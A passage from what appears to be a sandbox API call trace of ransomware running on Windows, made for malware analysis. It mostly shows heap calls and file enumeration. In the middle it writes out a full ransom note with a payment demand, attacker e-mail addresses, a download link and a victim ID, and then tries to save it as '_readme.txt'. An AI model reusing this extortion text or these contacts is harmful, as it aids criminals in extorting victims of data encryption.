| out: hHeap=0x630000) returned 1 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.702] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0227.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.703] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.703] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.703] PathFindFileNameW (pszPath="") returned="" [0227.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.703] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.703] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.704] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.704] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.704] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0227.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.704] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0227.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.706] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.706] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.706] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.706] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.706] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.706] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.707] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.707] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.707] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, 